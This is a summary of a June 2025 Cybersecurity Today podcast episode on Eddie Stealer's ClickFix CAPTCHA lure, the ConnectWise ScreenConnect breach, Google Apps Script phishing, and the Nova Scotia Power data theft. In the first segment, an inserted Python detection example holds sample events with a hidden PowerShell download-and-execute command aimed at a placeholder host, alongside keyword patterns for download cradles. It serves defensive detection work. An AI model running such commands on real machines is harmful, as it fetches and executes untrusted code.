Cybersecurity Incidents: Eddie Stealer Malware, ConnectWise Breach, and Nova Scotia Power Data Theft
Cybersecurity Today
Host: Jim Love
Release Date: June 2, 2025
1. Eddie Stealer Malware and ClickFix CAPTCHA Phishing
The episode kicks off with an in-depth analysis of a new malware campaign involving the Eddie Stealer, a Rust-based information stealer. This malware is being distributed through the ClickFix CAPTCHA phishing tactic, which manipulates users into executing malicious PowerShell scripts via deceptive CAPTCHA verification pages.
Key Points:
- Deployment Method: Threat actors compromise legitimate websites by injecting malicious JavaScript payloads that display fake CAPTCHA verification prompts, urging users to perform a three-step verification process.
- Execution Process: Users are tricked into copying and pasting obscured PowerShell commands into the Windows Run dialog, which then fetches and executes further malicious scripts from external servers.
- Payload Details: The initial JavaScript payload (G_verify_GJS) downloads the Eddie Stealer binary, which is stored in the Downloads folder with a randomized 12-character filename. Eddie Stealer is capable of harvesting sensitive information, including credentials, browser data, and cryptocurrency wallets.
Notable Quote:
"The main goal of this intermediate script is to fetch the Eddie Stealer binary from the same remote server and store it in the Downloads folder with a pseudo-random 12-character file name."
— David Shipley [02:15]
Impact: According to Elastic Security Labs, Eddie Stealer can extract system metadata and siphon data from various applications, posing a significant threat to personal and organizational security.
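The ClickFix chain described above leaves a recognisable trace in endpoint telemetry: a command pasted into the Run dialog is launched directly by explorer.exe, and the pasted command typically asks for a hidden window and downloads or decodes a second stage. The following is an added illustration, not code from the episode or from Elastic Security Labs; it scans constructed Sysmon-style process-creation events and the field names, the parent-process assumption, and the keyword list are my own assumptions for the example.

```python
import re

# Constructed sample process-creation events (Sysmon-style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/verify.txt -UseBasicParsing)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -EncodedCommand QUJDREVGR0g="},  # placeholder blob, never decoded here
    {"ParentImage": r"C:\Program Files\Corp\Agent.exe",  # legitimate scheduled inventory script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

# Script hosts a pasted Run-dialog command would typically invoke (assumption for this example).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# Download cradles, in-memory execution, or an encoded command line.
CRADLE = re.compile(
    r"\b(?:iwr|invoke-webrequest|downloadstring|invoke-expression|iex|curl|bitsadmin)\b"
    r"|-e(?:nc|ncodedcommand)?\b", re.I)


def classify(event):
    """Return the reasons an event resembles a ClickFix chain; [] when it looks benign."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    if image not in INTERPRETERS:
        return []
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    cmd = event["CommandLine"]
    reasons = []
    if parent == "explorer.exe":  # Run dialog / pasted command: explorer spawns the interpreter directly
        reasons.append("interpreter spawned directly by explorer.exe")
    if HIDDEN.search(cmd):
        reasons.append("hidden window requested")
    if CRADLE.search(cmd):
        reasons.append("download/execute or encoded command")
    # Require two independent signals so a lone admin-run script does not alert.
    return reasons if len(reasons) >= 2 else []


def scan(events):
    """Return (index, reasons) for every event that classify() flags."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Run against real telemetry, the same two-signal rule would be fed from process-creation events (Sysmon Event ID 1 or Windows Security 4688 with command-line logging enabled), and the RunMRU registry key offers a second source for what was pasted into the Run dialog.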
2. ConnectWise Cyberattack Linked to Nation State Actors
The discussion transitions to a significant breach at ConnectWise, a Florida-based IT management software firm. The breach is suspected to be orchestrated by sophisticated nation-state threat actors, targeting a limited number of ScreenConnect customers.
Key Points:
- Company Response: ConnectWise has engaged Mandiant for forensic investigations and is coordinating with law enforcement to address the breach.
- Affected Services: The primary impact was on the ScreenConnect remote access and support tool, which is widely used by managed service providers and IT departments.
- Scope of Breach: Initial reports suggest the breach occurred in August 2024 and was discovered in May 2025, affecting only cloud-based ScreenConnect instances.
- Vulnerability Details: The incident is linked to a high-severity vulnerability (CVE-2025-3935) in ScreenConnect, patched on April 24th.
Notable Quotes:
"We have launched an investigation with one of the leading forensic experts, Mandiant. We have contacted all the affected customers and are now coordinating with law enforcement."
— ConnectWise Advisory [05:30]
"Only a very small number of customers were impacted, suggesting the threat actor carried out a targeted attack against specific organizations."
— Jason Slagle, President of CNWR [08:45]
Impact: While the exact number of affected customers remains undisclosed, sources indicate that the breach was highly targeted, emphasizing the persistent threats posed by nation-state actors to specialized software solutions.
3. Abuse of Google Apps Scripts in Phishing Attacks
Howard Solomon highlights a novel phishing strategy where attackers exploit Google Apps Scripts to bypass traditional phishing defenses, embedding malicious links within trusted Google-hosted environments.
Key Points:
- Attack Mechanism: Users receive phishing emails containing links that direct them to script.google.com, leveraging the trust associated with Google services to establish legitimacy.
- Google Apps Script Capabilities: This cloud-based JavaScript platform allows developers to automate tasks and integrate with various Google products, making it an attractive medium for attackers to host malicious content without raising immediate suspicions.
- User Deception: By utilizing a trusted domain, threat actors aim to lower the victim's guard, encouraging them to input sensitive information like email credentials without thorough scrutiny.
Notable Quotes:
"By using a trusted platform to host the phishing page, the threat actor creates the false sense of security, obscuring the underlying threat with the goal of getting the recipient to enter their email and password without thinking about it."
— David Shipley [12:05]
"If your team believes that no possible phishes can get by your email filter, they can actually click 140% more on phishing scams."
— Report from Cofense [14:50]
Mitigation Strategies: CISOs are urged to reinforce regular security awareness training, emphasizing vigilance against even seemingly legitimate messages and recognizing that brand association does not guarantee safety.
4. Nova Scotia Power Data Breach Involving Social Insurance Numbers
The final segment addresses a major data breach at Nova Scotia Power, where cyber thieves accessed sensitive customer information, including up to 140,000 social insurance numbers.
Key Points:
- Breach Details: On May 23rd, a ransomware attack compromised the data of approximately 280,000 customers, with around half containing confidential nine-digit social insurance numbers.
- Data Usage: The utility collects Social Insurance Numbers (SINs) to authenticate customer identities, especially in cases of duplicate names, ensuring precise identification and service delivery.
- Corporate Response: Peter Gregg, CEO of Nova Scotia Power, confirmed the breach to the Canadian Press and highlighted the extensive nature of the compromised data.
Notable Quotes:
"We needed the social insurance numbers to differentiate people who had the same name. If there are a number of John McDonalds in the province, the social insurance number determines which one the utility was talking to."
— Peter Gregg, CEO of Nova Scotia Power [19:30]
Impact: This breach stands as one of the largest in Canada, reflecting the escalating risk to utilities that manage highly sensitive customer data. The exposure of SINs poses significant risks for identity theft and fraud among affected individuals.
Conclusion
The episode underscores the evolving landscape of cybersecurity threats, from sophisticated malware distribution methods and targeted nation-state attacks to innovative phishing strategies leveraging trusted platforms. The highlighted incidents emphasize the critical need for robust security measures, continuous monitoring, and comprehensive employee training to mitigate risks and protect sensitive data.
Listener Takeaway: Stay informed about the latest cybersecurity threats, maintain vigilant security practices, and ensure that both technological defenses and human factors are addressed to safeguard against increasingly complex cyberattacks.
This summary was prepared based on the transcript of the June 2, 2025, episode of Cybersecurity Today, hosted by Jim Love. For more insights and updates, consider listening to the full episode.
